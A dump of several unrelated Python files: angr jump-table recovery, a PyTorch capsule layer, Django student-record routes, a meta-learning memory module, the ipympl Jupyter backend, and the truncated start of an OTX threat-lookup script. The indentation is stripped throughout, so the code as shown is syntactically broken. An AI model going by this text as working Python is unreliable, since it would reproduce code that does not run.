if isinstance(stmt, pyvex.IRStmt.WrTmp) and stmt.tmp == block.next.tmp and \
isinstance(stmt.data, pyvex.IRExpr.ITE):
# yes!
ite_stmt, ite_stmt_loc = stmt, stmt_loc
break
return ite_stmt, ite_stmt_loc, stmts_to_remove
def _jumptable_precheck(self, b):
"""
Perform a pre-check on the slice to determine whether it is a jump table or not. Please refer to the docstring
of JumpTableProcessor for how precheck and statement instrumentation works. A NotAJumpTableNotification
exception will be raised if the slice fails this precheck.
:param b: The statement slice generated by Blade.
:return: A list of statements to instrument, and a list of of registers to initialize.
:rtype: tuple of lists
"""
# pylint:disable=no-else-continue
engine = JumpTableProcessor(self.project)
sources = [ n for n in b.slice.nodes() if b.slice.in_degree(n) == 0 ]
annotatedcfg = AnnotatedCFG(self.project, None, detect_loops=False)
annotatedcfg.from_digraph(b.slice)
for src in sources:
state = JumpTableProcessorState(self.project.arch)
traced = { src[0] }
while src is not None:
state._tmpvar_source.clear()
block_addr, _ = src
block = self.project.factory.block(block_addr, cross_insn_opt=True, backup_state=self.base_state)
stmt_whitelist = annotatedcfg.get_whitelisted_statements(block_addr)
engine.process(state, block=block, whitelist=stmt_whitelist)
if state.is_jumptable:
return state.stmts_to_instrument, state.regs_to_initialize
if state.is_jumptable is False:
raise NotAJumpTableNotification()
# find the next block
src = None
for idx in reversed(stmt_whitelist):
loc = (block_addr, idx)
successors = list(b.slice.successors(loc))
if len(successors) == 1:
block_addr_ = successors[0][0]
if block_addr_ not in traced:
src = successors[0]
traced.add(block_addr_)
break
raise NotAJumpTableNotification()
@staticmethod
def _try_resolve_single_constant_loads(load_stmt, cfg, addr):
"""
Resolve cases where only a single constant load is required to resolve the indirect jump. Strictly speaking, it
is not a jump table, but we resolve it here anyway.
:param load_stmt: The pyvex.IRStmt.Load statement that loads an address.
:param cfg: The CFG instance.
:param int addr: Address of the jump table block.
:return: A jump target, or None if it cannot be resolved.
:rtype: int or None
"""
# If we're just reading a constant, don't bother with the rest of this mess!
if isinstance(load_stmt, pyvex.IRStmt.WrTmp):
if type(load_stmt.data.addr) is pyvex.IRExpr.Const:
# It's directly loading from a constant address
# e.g.,
# ldr r0, =main+1
# blx r0
# It's not a jump table, but we resolve it anyway
jump_target_addr = load_stmt.data.addr.con.value
jump_target = cfg._fast_memory_load_pointer(jump_target_addr)
if jump_target is None:
l.info("Constant indirect jump %#x points outside of loaded memory to %#08x", addr,
jump_target_addr)
raise NotAJumpTableNotification()
l.info("Resolved constant indirect jump from %#08x to %#08x", addr, jump_target_addr)
return jump_target
elif isinstance(load_stmt, pyvex.IRStmt.LoadG):
if type(load_stmt.addr) is pyvex.IRExpr.Const:
# It's directly loading from a constant address
# e.g.,
# 4352c SUB R1, R11, #0x1000
# 43530 LDRHI R3, =loc_45450
# ...
# 43540 MOV PC, R3
#
# It's not a jump table, but we resolve it anyway
# Note that this block has two branches: One goes to 45450, the other one goes to whatever the original
# value of R3 is. Some intensive data-flow analysis is required in this case.
jump_target_addr = load_stmt.addr.con.value
jump_target = cfg._fast_memory_load_pointer(jump_target_addr)
l.info("Resolved constant indirect jump from %#08x to %#08x", addr, jump_target_addr)
return jump_target
return None
def _try_resolve_targets_load(self, r, addr, cfg, annotatedcfg, load_stmt, load_size, stmts_adding_base_addr,
all_addr_holders):
"""
Try loading all jump targets from a jump table or a vtable.
"""
# shorthand
project = self.project
try:
whitelist = annotatedcfg.get_whitelisted_statements(r.addr)
last_stmt = annotatedcfg.get_last_statement_index(r.addr)
succ = project.factory.successors(r, whitelist=whitelist, last_stmt=last_stmt)
except (AngrError, SimError):
# oops there are errors
l.warning('Cannot get jump successor states from a path that has reached the target. Skip it.')
return None
all_states = succ.flat_successors + succ.unconstrained_successors
if not all_states:
l.warning("Slicecutor failed to execute the program slice. No output state is available.")
return None
state = all_states[0] # Just take the first state
self._cached_memread_addrs.clear() # clear the cache to save some memory (and avoid confusion when debugging)
# Parse the memory load statement and get the memory address of where the jump table is stored
jumptable_addr = self._parse_load_statement(load_stmt, state)
if jumptable_addr is None:
return None
# sanity check and necessary pre-processing
if stmts_adding_base_addr:
if len(stmts_adding_base_addr) != 1:
# We do not support the cases where the base address involves more than one addition.
# One such case exists in libc-2.27.so shipped with Ubuntu x86 where esi is used as the address of the
# data region.
#
# .text:00047316 mov eax, esi
# .text:00047318 mov esi, [ebp+data_region_ptr]
# .text:0004731E movsx eax, al
# .text:00047321 movzx eax, byte ptr [esi+eax-603A0h]
# .text:00047329 mov eax, ds:(jpt_47337 - 1D8000h)[esi+eax*4] ; switch 32 cases
# .text:00047330 lea eax, (loc_47033 - 1D8000h)[esi+eax] ; jumptable 00047337 cases 0-13,27-31
# .text:00047337 jmp eax ; switch
#
# the proper solution requires angr to correctly determine that esi is the beginning address of the data
# region (in this case, 0x1d8000). we give up in such cases until we can reasonably perform a
# full-function data propagation before performing jump table recovery.
return None
jump_base_addr = stmts_adding_base_addr[0]
if jump_base_addr.base_addr_available:
addr_holders = {(jump_base_addr.stmt_loc[0], jump_base_addr.tmp)}
else:
addr_holders = {(jump_base_addr.stmt_loc[0], jump_base_addr.tmp),
(jump_base_addr.stmt_loc[0], jump_base_addr.tmp_1)
}
if len(set(all_addr_holders.keys()).intersection(addr_holders)) != 1:
# for some reason it's trying to add a base address onto a different temporary variable that we
# are not aware of. skip.
return None
if not jump_base_addr.base_addr_available:
# we need to decide which tmp is the address holder and which tmp holds the base address
addr_holder = next(iter(set(all_addr_holders.keys()).intersection(addr_holders)))
if jump_base_addr.tmp_1 == addr_holder[1]:
# swap the two tmps
jump_base_addr.tmp, jump_base_addr.tmp_1 = jump_base_addr.tmp_1, jump_base_addr.tmp
# Load the concrete base address
jump_base_addr.base_addr = state.solver.eval(state.scratch.temps[jump_base_addr.tmp_1])
all_targets = [ ]
jumptable_addr_vsa = jumptable_addr._model_vsa
if not isinstance(jumptable_addr_vsa, claripy.vsa.StridedInterval):
return None
# we may resolve a vtable (in C, e.g., the IO_JUMPS_FUNC in libc), but the stride of this load is usually 1
# while the read statement reads a word size at a time.
# we use this to differentiate between traditional jump tables (where each entry is some blocks that belong to
# the current function) and vtables (where each entry is a function).
if jumptable_addr_vsa.stride < load_size:
stride = load_size
total_cases = jumptable_addr_vsa.cardinality // load_size
sort = 'vtable' # it's probably a vtable!
else:
stride = jumptable_addr_vsa.stride
total_cases = jumptable_addr_vsa.cardinality
sort = 'jumptable'
if total_cases > self._max_targets:
# We resolved too many targets for this indirect jump. Something might have gone wrong.
l.debug("%d targets are resolved for the indirect jump at %#x. It may not be a jump table. Try the "
"next source, if there is any.",
total_cases, addr)
return None
# Or alternatively, we can ask user, which is meh...
#
# jump_base_addr = int(raw_input("please give me the jump base addr: "), 16)
# total_cases = int(raw_input("please give me the total cases: "))
# jump_target = state.solver.SI(bits=64, lower_bound=jump_base_addr, upper_bound=jump_base_addr +
# (total_cases - 1) * 8, stride=8)
jump_table = [ ]
min_jumptable_addr = state.solver.min(jumptable_addr)
max_jumptable_addr = state.solver.max(jumptable_addr)
# Both the min jump target and the max jump target should be within a mapped memory region
# i.e., we shouldn't be jumping to the stack or somewhere unmapped
if (not project.loader.find_segment_containing(min_jumptable_addr) or
not project.loader.find_segment_containing(max_jumptable_addr)):
if (not project.loader.find_section_containing(min_jumptable_addr) or
not project.loader.find_section_containing(max_jumptable_addr)):
l.debug("Jump table %#x might have jump targets outside mapped memory regions. "
"Continue to resolve it from the next data source.", addr)
return None
# Load the jump table from memory
should_skip = False
for idx, a in enumerate(range(min_jumptable_addr, max_jumptable_addr + 1, stride)):
if idx % 100 == 0 and idx != 0:
l.debug("%d targets have been resolved for the indirect jump at %#x...", idx, addr)
if idx >= total_cases:
break
target = cfg._fast_memory_load_pointer(a, size=load_size)
if target is None:
l.debug("Cannot load pointer from address %#x. Skip.", a)
should_skip = True
break
all_targets.append(target)
if should_skip:
return None
# Adjust entries inside the jump table
if stmts_adding_base_addr:
stmt_adding_base_addr = stmts_adding_base_addr[0]
base_addr = stmt_adding_base_addr.base_addr
conversions = list(reversed(list(v for v in all_addr_holders.values()
if v[0] is not AddressTransferringTypes.Assignment)))
if conversions:
invert_conversion_ops = []
for conv in conversions:
if len(conv) == 1:
conversion_op, args = conv[0], None
else:
conversion_op, args = conv[0], conv[1:]
if conversion_op is AddressTransferringTypes.SignedExtension:
if args == (32, 64):
lam = lambda a: (a | 0xffffffff00000000) if a >= 0x80000000 else a
else:
raise NotImplementedError("Unsupported signed extension operation.")
elif conversion_op is AddressTransferringTypes.UnsignedExtension:
lam = lambda a: a
elif conversion_op is AddressTransferringTypes.Truncation:
if args == (64, 32):
lam = lambda a: a & 0xffffffff
else:
raise NotImplementedError("Unsupported truncation operation.")
elif conversion_op is AddressTransferringTypes.Or1:
lam = lambda a: a | 1
elif conversion_op is AddressTransferringTypes.ShiftLeft:
shift_amount = args[0]
lam = lambda a, sl=shift_amount: a << sl
else:
raise NotImplementedError("Unsupported conversion operation.")
invert_conversion_ops.append(lam)
all_targets_copy = all_targets
all_targets = []
for target_ in all_targets_copy:
for lam in invert_conversion_ops:
target_ = lam(target_)
all_targets.append(target_)
mask = (2 ** self.project.arch.bits) - 1
all_targets = [(target + base_addr) & mask for target in all_targets]
# special case for ARM: if the source block is in THUMB mode, all jump targets should be in THUMB mode, too
if is_arm_arch(self.project.arch) and (addr & 1) == 1:
all_targets = [ target | 1 for target in all_targets ]
# Finally... all targets are ready
illegal_target_found = False
for target in all_targets:
# if the total number of targets is suspicious (it usually implies a failure in applying the
# constraints), check if all jump targets are legal
if len(all_targets) in {1, 0x100, 0x10000} and not self._is_jumptarget_legal(target):
l.info("Jump target %#x is probably illegal. Try to resolve indirect jump at %#x from the next source.",
target, addr)
illegal_target_found = True
break
jump_table.append(target)
if illegal_target_found:
return None
return jump_table, min_jumptable_addr, load_size, total_cases * load_size, all_targets, sort
def _try_resolve_targets_ite(self, r, addr, cfg, annotatedcfg, ite_stmt: pyvex.IRStmt.WrTmp): # pylint:disable=unused-argument
"""
Try loading all jump targets from parsing an ITE block.
"""
project = self.project
try:
whitelist = annotatedcfg.get_whitelisted_statements(r.addr)
last_stmt = annotatedcfg.get_last_statement_index(r.addr)
succ = project.factory.successors(r, whitelist=whitelist, last_stmt=last_stmt)
except (AngrError, SimError):
# oops there are errors
l.warning('Cannot get jump successor states from a path that has reached the target. Skip it.')
return None
all_states = succ.flat_successors + succ.unconstrained_successors
if not all_states:
l.warning("Slicecutor failed to execute the program slice. No output state is available.")
return None
state = all_states[0] # Just take the first state
temps = state.scratch.temps
if not isinstance(ite_stmt.data, pyvex.IRExpr.ITE):
return None
# load the default
if not isinstance(ite_stmt.data.iffalse, pyvex.IRExpr.Const):
return None
# ite_stmt.data.iffalse.con.value is garbage introduced by the VEX ARM lifter and should be ignored
if not isinstance(ite_stmt.data.iftrue, pyvex.IRExpr.RdTmp):
return None
if not isinstance(ite_stmt.data.cond, pyvex.IRExpr.RdTmp):
return None
cond = temps[ite_stmt.data.cond.tmp]
# apply the constraint
state.add_constraints(cond == 1)
# load the target
target_expr = temps[ite_stmt.data.iftrue.tmp]
jump_table = state.solver.eval_upto(target_expr, self._max_targets + 1)
entry_size = len(target_expr) // self.project.arch.byte_width
if len(jump_table) == self._max_targets + 1:
# so many targets! failed
return None
return jump_table, len(jump_table), entry_size
@staticmethod
def _instrument_statements(state, stmts_to_instrument, regs_to_initialize):
"""
Hook statements as specified in stmts_to_instrument and overwrite values loaded in those statements.
:param SimState state: The program state to insert hooks to.
:param list stmts_to_instrument: A list of statements to instrument.
:param list regs_to_initialize: A list of registers to initialize.
:return: None
"""
for sort, block_addr, stmt_idx in stmts_to_instrument:
l.debug("Add a %s hook to overwrite memory/register values at %#x:%d.", sort, block_addr, stmt_idx)
if sort == 'mem_write':
bp = BP(when=BP_BEFORE, enabled=True, action=StoreHook.hook,
condition=lambda _s, a=block_addr, idx=stmt_idx:
_s.scratch.bbl_addr == a and _s.scratch.stmt_idx == idx
)
state.inspect.add_breakpoint('mem_write', bp)
elif sort == 'mem_read':
hook = LoadHook()
bp0 = BP(when=BP_BEFORE, enabled=True, action=hook.hook_before,
condition=lambda _s, a=block_addr, idx=stmt_idx:
_s.scratch.bbl_addr == a and _s.scratch.stmt_idx == idx
)
state.inspect.add_breakpoint('mem_read', bp0)
bp1 = BP(when=BP_AFTER, enabled=True, action=hook.hook_after,
condition=lambda _s, a=block_addr, idx=stmt_idx:
_s.scratch.bbl_addr == a and _s.scratch.stmt_idx == idx
)
state.inspect.add_breakpoint('mem_read', bp1)
elif sort == 'reg_write':
bp = BP(when=BP_BEFORE, enabled=True, action=PutHook.hook,
condition=lambda _s, a=block_addr, idx=stmt_idx:
_s.scratch.bbl_addr == a and _s.scratch.stmt_idx == idx
)
state.inspect.add_breakpoint('reg_write', bp)
else:
raise NotImplementedError("Unsupported sort %s in stmts_to_instrument." % sort)
reg_val = 0x13370000
for block_addr, stmt_idx, reg_offset, reg_bits in regs_to_initialize:
l.debug("Add a hook to initialize register %s at %x:%d.",
state.arch.translate_register_name(reg_offset, size=reg_bits),
block_addr, stmt_idx)
bp = BP(when=BP_BEFORE, enabled=True, action=RegisterInitializerHook(reg_offset, reg_bits, reg_val).hook,
condition=lambda _s: _s.scratch.bbl_addr == block_addr and _s.inspect.statement == stmt_idx
)
state.inspect.add_breakpoint('statement', bp)
reg_val += 16
def _find_bss_region(self):
self._bss_regions = [ ]
# TODO: support other sections other than '.bss'.
# TODO: this is very hackish. fix it after the chaos.
for section in self.project.loader.main_object.sections:
if section.name == '.bss':
self._bss_regions.append((section.vaddr, section.memsize))
break
def _init_registers_on_demand(self, state):
# for uninitialized read using a register as the source address, we replace them in memory on demand
read_addr = state.inspect.mem_read_address
cond = state.inspect.mem_read_condition
if not isinstance(read_addr, int) and read_addr.uninitialized and cond is None:
# if this AST has been initialized before, just use the cached addr
cached_addr = self._cached_memread_addrs.get(read_addr, None)
if cached_addr is not None:
state.inspect.mem_read_address = cached_addr
return
read_length = state.inspect.mem_read_length
if not isinstance(read_length, int):
read_length = read_length._model_vsa.upper_bound
if read_length > 16:
return
new_read_addr = state.solver.BVV(UninitReadMeta.uninit_read_base, state.arch.bits)
UninitReadMeta.uninit_read_base += read_length
# replace the expression in registers
state.registers.replace_all(read_addr, new_read_addr)
# extra caution: if this read_addr AST comes up again in the future, we want to replace it with the same
# address again.
self._cached_memread_addrs[read_addr] = new_read_addr
state.inspect.mem_read_address = new_read_addr
# job done :-)
def _dbg_repr_slice(self, blade, in_slice_stmts_only=False):
stmts = defaultdict(set)
for addr, stmt_idx in sorted(list(blade.slice.nodes())):
stmts[addr].add(stmt_idx)
for addr in sorted(stmts.keys()):
stmt_ids = stmts[addr]
irsb = self.project.factory.block(addr, cross_insn_opt=True, backup_state=self.base_state).vex
print(" ####")
print(" #### Block %#x" % addr)
print(" ####")
for i, stmt in enumerate(irsb.statements):
stmt_taken = i in stmt_ids
display = stmt_taken if in_slice_stmts_only else True
if display:
s = "%s %x:%02d | " % ("+" if stmt_taken else " ", addr, i)
s += "%s " % stmt.__str__(arch=self.project.arch, tyenv=irsb.tyenv)
if stmt_taken:
s += "IN: %d" % blade.slice.in_degree((addr, i))
print(s)
# the default exit
default_exit_taken = DEFAULT_STATEMENT in stmt_ids
s = "%s %x:default | PUT(%s) = %s; %s" % ("+" if default_exit_taken else " ", addr, irsb.offsIP, irsb.next,
irsb.jumpkind
)
print(s)
def _initial_state(self, src_irsb):
state = self.project.factory.blank_state(
addr=src_irsb,
mode='static',
add_options={
o.DO_RET_EMULATION,
o.TRUE_RET_EMULATION_GUARD,
o.AVOID_MULTIVALUED_READS,
},
remove_options={
o.CGC_ZERO_FILL_UNCONSTRAINED_MEMORY,
o.UNINITIALIZED_ACCESS_AWARENESS,
} | o.refs
)
return state
@staticmethod
def _parse_load_statement(load_stmt, state):
"""
Parse a memory load VEX statement and get the jump target addresses.
:param load_stmt: The VEX statement for loading the jump target addresses.
:param state: The SimState instance (in static mode).
:return: An abstract value (or a concrete value) representing the jump target addresses. Return None
if we fail to parse the statement.
"""
# The jump table address is stored in a tmp. In this case, we find the jump-target loading tmp.
load_addr_tmp = None
if isinstance(load_stmt, pyvex.IRStmt.WrTmp):
if type(load_stmt.data.addr) is pyvex.IRExpr.RdTmp:
load_addr_tmp = load_stmt.data.addr.tmp
elif type(load_stmt.data.addr) is pyvex.IRExpr.Const:
# It's directly loading from a constant address
# e.g.,
# ldr r0, =main+1
# blx r0
# It's not a jump table, but we resolve it anyway
jump_target_addr = load_stmt.data.addr.con.value
return state.solver.BVV(jump_target_addr, state.arch.bits)
elif isinstance(load_stmt, pyvex.IRStmt.LoadG):
if type(load_stmt.addr) is pyvex.IRExpr.RdTmp:
load_addr_tmp = load_stmt.addr.tmp
elif type(load_stmt.addr) is pyvex.IRExpr.Const:
# It's directly loading from a constant address
# e.g.,
# 4352c SUB R1, R11, #0x1000
# 43530 LDRHI R3, =loc_45450
# ...
# 43540 MOV PC, R3
#
# It's not a jump table, but we resolve it anyway
# Note that this block has two branches: One goes to 45450, the other one goes to whatever the original
# value of R3 is. Some intensive data-flow analysis is required in this case.
jump_target_addr = load_stmt.addr.con.value
return state.solver.BVV(jump_target_addr, state.arch.bits)
else:
raise TypeError("Unsupported address loading statement type %s." % type(load_stmt))
if state.scratch.temps[load_addr_tmp] is None:
# the tmp variable is not there... umm...
return None
jump_addr = state.scratch.temps[load_addr_tmp]
if isinstance(load_stmt, pyvex.IRStmt.LoadG):
# LoadG comes with a guard. We should apply this guard to the load expression
guard_tmp = load_stmt.guard.tmp
guard = state.scratch.temps[guard_tmp] != 0
try:
jump_addr = state.memory._apply_condition_to_symbolic_addr(jump_addr, guard)
except Exception: # pylint: disable=broad-except
l.exception("Error computing jump table address!")
return None
return jump_addr
def _is_jumptarget_legal(self, target):
try:
vex_block = self.project.factory.block(target, cross_insn_opt=True).vex_nostmt
except (AngrError, SimError):
return False
if vex_block.jumpkind == 'Ijk_NoDecode':
return False
if vex_block.size == 0:
return False
return True
|
py | 7dfaa2bd8cc534dc5388da53ab2342723a53378e | import torch
import torch.nn as nn
import torch.nn.functional as F
class Capsule(nn.Module):
def __init__(self, input_dim_capsule=1024, num_capsule=5, dim_capsule=5, routings=4):
super(Capsule, self).__init__()
self.num_capsule = num_capsule
self.dim_capsule = dim_capsule
self.routings = routings
self.activation = self.squash
self.W = nn.Parameter(
nn.init.xavier_normal_(torch.empty(1, input_dim_capsule, self.num_capsule * self.dim_capsule)))
def forward(self, x):
u_hat_vecs = torch.matmul(x, self.W)
batch_size = x.size(0)
input_num_capsule = x.size(1)
u_hat_vecs = u_hat_vecs.view((batch_size, input_num_capsule,
self.num_capsule, self.dim_capsule))
u_hat_vecs = u_hat_vecs.permute(
0, 2, 1, 3).contiguous() # (batch_size,num_capsule,input_num_capsule,dim_capsule)
with torch.no_grad():
b = torch.zeros_like(u_hat_vecs[:, :, :, 0])
for i in range(self.routings):
c = F.softmax(b, dim=1) # (batch_size,num_capsule,input_num_capsule)
outputs = self.activation(torch.sum(c.unsqueeze(-1) * u_hat_vecs, dim=2)) # bij,bijk->bik
if i < self.routings - 1:
b = (torch.sum(outputs.unsqueeze(2) * u_hat_vecs, dim=-1)) # bik,bijk->bij
return outputs # (batch_size, num_capsule, dim_capsule)
def squash(self, x, axis=-1):
s_squared_norm = (x ** 2).sum(axis, keepdim=True)
scale = torch.sqrt(s_squared_norm + 1e-7)
return x / scale
|
py | 7dfaa2cde826f83896d112079f1fcc6707dc9c94 | from django.conf.urls import url
from . import views
urlpatterns = [
url(
r'show$',
views.get_students,
),
url(
r'query$',
views.query_students,
),
url(
r'checkID$',
views.check_studentID,
),
url(
r'add$',
views.add_student,
),
url(
r'update$',
views.update_student,
),
url(
r'delete$',
views.delete_student,
),
url(
r'deletebatch$',
views.delete_students,
),
url(
r'upload$',
views.upload,
),
]
|
py | 7dfaa303e71f3bbffb8f2f545f171cd58d3227ec | from utils import *
class FeatureMem:
def __init__(self, n_k, u_emb_dim, base_model, device):
self.n_k = n_k
self.base_model = base_model
self.p_memory = torch.randn(n_k, u_emb_dim, device=device).normal_() # on device
u_param, _, _ = base_model.get_weights()
self.u_memory = []
for i in range(n_k):
bias_list = []
for param in u_param:
bias_list.append(param.normal_(std=0.05))
self.u_memory.append(bias_list)
self.att_values = torch.zeros(n_k).to(device)
self.device = device
def read_head(self, p_u, alpha, train=True):
# get personalized mu
att_model = Attention(self.n_k).to(self.device)
attention_values = att_model(p_u, self.p_memory).to(self.device) # pu on device
personalized_mu = get_mu(attention_values, self.u_memory, self.base_model, self.device)
# update mp
transposed_att = attention_values.reshape(self.n_k, 1)
product = torch.mm(transposed_att, p_u)
if train:
self.p_memory = alpha * product + (1-alpha) * self.p_memory
self.att_values = attention_values
return personalized_mu, attention_values
def write_head(self, u_grads, lr):
update_mu(self.att_values, self.u_memory, u_grads, lr)
class TaskMem:
def __init__(self, n_k, emb_dim, device):
self.n_k = n_k
self.memory_UI = torch.rand(n_k, emb_dim *2, emb_dim*2, device=device).normal_()
self.att_values = torch.zeros(n_k)
def read_head(self, att_values):
self.att_values = att_values
return get_mui(att_values, self.memory_UI, self.n_k)
def write_head(self, u_mui, lr):
update_values = update_mui(self.att_values, self.n_k, u_mui)
self.memory_UI = lr* update_values + (1-lr) * self.memory_UI
def cosine_similarity(input1, input2):
query_norm = torch.sqrt(torch.sum(input1**2+0.00001, 1))
doc_norm = torch.sqrt(torch.sum(input2**2+0.00001, 1))
prod = torch.sum(torch.mul(input1, input2), 1)
norm_prod = torch.mul(query_norm, doc_norm)
cos_sim_raw = torch.div(prod, norm_prod)
return cos_sim_raw
class Attention(torch.nn.Module):
def __init__(self, n_k, activation='relu'):
super(Attention, self).__init__()
self.n_k = n_k
self.fc_layer = torch.nn.Linear(self.n_k, self.n_k, activation_func(activation))
self.soft_max_layer = torch.nn.Softmax()
def forward(self, pu, mp):
expanded_pu = pu.repeat(1, len(mp)).view(len(mp), -1) # shape, n_k, pu_dim
inputs = cosine_similarity(expanded_pu, mp)
fc_layers = self.fc_layer(inputs)
attention_values = self.soft_max_layer(fc_layers)
return attention_values
def get_mu(att_values, mu, model, device):
mu0,_,_ = model.get_zero_weights()
attention_values = att_values.reshape(len(mu),1)
for i in range(len(mu)):
for j in range(len(mu[i])):
mu0[j] += attention_values[i] * mu[i][j].to(device)
return mu0
def update_mu(att_values, mu, grads, lr):
att_values = att_values.reshape(len(mu), 1)
for i in range(len(mu)):
for j in range(len(mu[i])):
mu[i][j] = lr * att_values[i] * grads[j] + (1-lr) * mu[i][j]
def get_mui(att_values, mui, n_k):
attention_values = att_values.reshape(n_k, 1, 1)
attend_mui = torch.mul(attention_values, mui)
u_mui = attend_mui.sum(dim=0)
return u_mui
def update_mui(att_values, n_k, u_mui):
repeat_u_mui = u_mui.unsqueeze(0).repeat(n_k, 1, 1)
attention_tensor = att_values.reshape(n_k, 1, 1)
attend_u_mui = torch.mul(attention_tensor, repeat_u_mui)
return attend_u_mui
|
py | 7dfaa4ae1b01e19d3b01159593d7c6a4f761b5f7 | """Interactive figures in the Jupyter notebook"""
from base64 import b64encode
import json
import io
import six
import os
from uuid import uuid4 as uuid
from IPython.display import display, HTML
from ipywidgets import DOMWidget
from traitlets import Unicode, Bool, Float, List, Any
from matplotlib import rcParams
from matplotlib.figure import Figure
from matplotlib import is_interactive
from matplotlib.backends.backend_webagg_core import (FigureManagerWebAgg,
FigureCanvasWebAggCore,
NavigationToolbar2WebAgg,
TimerTornado)
from matplotlib.backend_bases import (ShowBase, NavigationToolbar2,
FigureCanvasBase)
class Show(ShowBase):
def __call__(self, block=None):
from matplotlib._pylab_helpers import Gcf
managers = Gcf.get_all_fig_managers()
if not managers:
return
interactive = is_interactive()
for manager in managers:
manager.show()
# plt.figure adds an event which puts the figure in focus
# in the activeQue. Disable this behaviour, as it results in
# figures being put as the active figure after they have been
# shown, even in non-interactive mode.
if hasattr(manager, '_cidgcf'):
manager.canvas.mpl_disconnect(manager._cidgcf)
if not interactive and manager in Gcf._activeQue:
Gcf._activeQue.remove(manager)
show = Show()
def draw_if_interactive():
import matplotlib._pylab_helpers as pylab_helpers
if is_interactive():
manager = pylab_helpers.Gcf.get_active()
if manager is not None:
manager.show()
def connection_info():
"""
Return a string showing the figure and connection status for
the backend. This is intended as a diagnostic tool, and not for general
use.
"""
from matplotlib._pylab_helpers import Gcf
result = []
for manager in Gcf.get_all_fig_managers():
fig = manager.canvas.figure
result.append('{0} - {0}'.format((fig.get_label() or
"Figure {0}".format(manager.num)),
manager.web_sockets))
if not is_interactive():
result.append('Figures pending show: {0}'.format(len(Gcf._activeQue)))
return '\n'.join(result)
# Note: Version 3.2 and 4.x icons
# http://fontawesome.io/3.2.1/icons/
# http://fontawesome.io/
# the `fa fa-xxx` part targets font-awesome 4, (IPython 3.x)
# the icon-xxx targets font awesome 3.21 (IPython 2.x)
_FONT_AWESOME_CLASSES = {
'home': 'fa fa-home icon-home',
'back': 'fa fa-arrow-left icon-arrow-left',
'forward': 'fa fa-arrow-right icon-arrow-right',
'zoom_to_rect': 'fa fa-square-o icon-check-empty',
'move': 'fa fa-arrows icon-move',
'download': 'fa fa-floppy-o icon-save',
'export': 'fa fa-file-picture-o icon-picture',
None: None
}
class NavigationIPy(NavigationToolbar2WebAgg):
# Use the standard toolbar items + download button
toolitems = [(text, tooltip_text,
_FONT_AWESOME_CLASSES[image_file], name_of_method)
for text, tooltip_text, image_file, name_of_method
in (NavigationToolbar2.toolitems +
(('Download', 'Download plot', 'download', 'download'),))
if image_file in _FONT_AWESOME_CLASSES]
def export(self):
buf = io.BytesIO()
self.canvas.figure.savefig(buf, format='png', dpi='figure')
# Figure width in pixels
pwidth = self.canvas.figure.get_figwidth() * self.canvas.figure.get_dpi()
# Scale size to match widget on HiPD monitors
width = pwidth / self.canvas._dpi_ratio
data = "<img src='data:image/png;base64,{0}' width={1}/>"
data = data.format(b64encode(buf.getvalue()).decode('utf-8'), width)
display(HTML(data))
here = os.path.dirname(__file__)
with open(os.path.join(here, 'static', 'package.json')) as fid:
js_version = json.load(fid)['version']
class FigureCanvasNbAgg(DOMWidget, FigureCanvasWebAggCore):
_model_module = Unicode('jupyter-matplotlib').tag(sync=True)
_model_module_version = Unicode('^%s' % js_version).tag(sync=True)
_model_name = Unicode('MPLCanvasModel').tag(sync=True)
_view_module = Unicode('jupyter-matplotlib').tag(sync=True)
_view_module_version = Unicode('^%s' % js_version).tag(sync=True)
_view_name = Unicode('MPLCanvasView').tag(sync=True)
_toolbar_items = List().tag(sync=True)
_closed = Bool(True)
_id = Unicode('').tag(sync=True)
# Must declare the superclass private members.
_png_is_old = Bool()
_force_full = Bool()
_current_image_mode = Unicode()
_dpi_ratio = Float(1.0)
_is_idle_drawing = Bool()
_is_saving = Bool()
_button = Any()
_key = Any()
_lastx = Any()
_lasty = Any()
_is_idle_drawing = Bool()
def __init__(self, figure, *args, **kwargs):
super(FigureCanvasWebAggCore, self).__init__(figure, *args, **kwargs)
super(DOMWidget, self).__init__(*args, **kwargs)
self._uid = uuid().hex
self.on_msg(self._handle_message)
def _handle_message(self, object, message, buffers):
# The 'supports_binary' message is relevant to the
# websocket itself. The other messages get passed along
# to matplotlib as-is.
# Every message has a "type" and a "figure_id".
message = json.loads(message)
if message['type'] == 'closing':
self._closed = True
elif message['type'] == 'supports_binary':
self.supports_binary = message['value']
elif message['type'] == 'initialized':
_, _, w, h = self.figure.bbox.bounds
self.manager.resize(w, h)
self.send_json('refresh')
else:
self.manager.handle_json(message)
def send_json(self, content):
self.send({'data': json.dumps(content)})
def send_binary(self, blob):
# The comm is ascii, so we always send the image in base64
# encoded data URL form.
data = b64encode(blob)
if six.PY3:
data = data.decode('ascii')
data_uri = "data:image/png;base64,{0}".format(data)
self.send({'data': data_uri})
def new_timer(self, *args, **kwargs):
return TimerTornado(*args, **kwargs)
def start_event_loop(self, timeout):
FigureCanvasBase.start_event_loop_default(self, timeout)
def stop_event_loop(self):
FigureCanvasBase.stop_event_loop_default(self)
class FigureManagerNbAgg(FigureManagerWebAgg):
ToolbarCls = NavigationIPy
def __init__(self, canvas, num):
FigureManagerWebAgg.__init__(self, canvas, num)
toolitems = []
for name, tooltip, image, method in self.ToolbarCls.toolitems:
if name is None:
toolitems.append(['', '', '', ''])
else:
toolitems.append([name, tooltip, image, method])
canvas._toolbar_items = toolitems
self.web_sockets = [self.canvas]
def show(self):
if self.canvas._closed:
self.canvas._closed = False
display(self.canvas)
else:
self.canvas.draw_idle()
def destroy(self):
self.canvas.close()
def new_figure_manager(num, *args, **kwargs):
"""
Create a new figure manager instance
"""
FigureClass = kwargs.pop('FigureClass', Figure)
thisFig = FigureClass(*args, **kwargs)
return new_figure_manager_given_figure(num, thisFig)
def new_figure_manager_given_figure(num, figure):
"""
Create a new figure manager instance for the given figure.
"""
from matplotlib._pylab_helpers import Gcf
def closer(event):
Gcf.destroy(num)
canvas = FigureCanvasNbAgg(figure)
if 'nbagg.transparent' in set(rcParams.keys()) and rcParams['nbagg.transparent']:
figure.patch.set_alpha(0)
manager = FigureManagerNbAgg(canvas, num)
if is_interactive():
manager.show()
figure.canvas.draw_idle()
canvas.mpl_connect('close_event', closer)
return manager
|
py | 7dfaa4d9c551dba6aff27bacfe2567c6faffef06 | #!/usr/bin/env python3
import json
import logging
from pprint import pformat
from OTXv2 import OTXv2
from OTXv2 import IndicatorTypes
from sys import path
from os.path import dirname as dir
path.append(dir(path[0]))
import otrs_functions
from config import LoadConfig
def Main(IPList, TicketID):
conf = LoadConfig.Load()
otx = OTXv2(conf["api_keys"]["AlienVaultAPI"])
for IP in IPList:
